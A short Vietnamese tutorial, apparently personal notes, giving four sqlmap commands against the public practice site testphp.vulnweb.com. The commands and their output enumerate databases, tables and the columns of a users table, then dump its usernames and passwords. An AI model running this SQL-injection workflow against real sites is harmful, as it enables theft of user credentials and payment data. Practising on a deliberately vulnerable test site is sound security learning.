trang:  http://testphp.vulnweb.com/listproducts.php?cat=1

mở cmd và copy các lệnh: 
cd C:\Python27\ArcGIS10.1\sqlmap

1.python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Database:
[*] acuart
[*] information_schema

2.python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart  --tables
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

3.python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

4. python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C "uname,pass" --dump

Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test  | test |
+-------+------+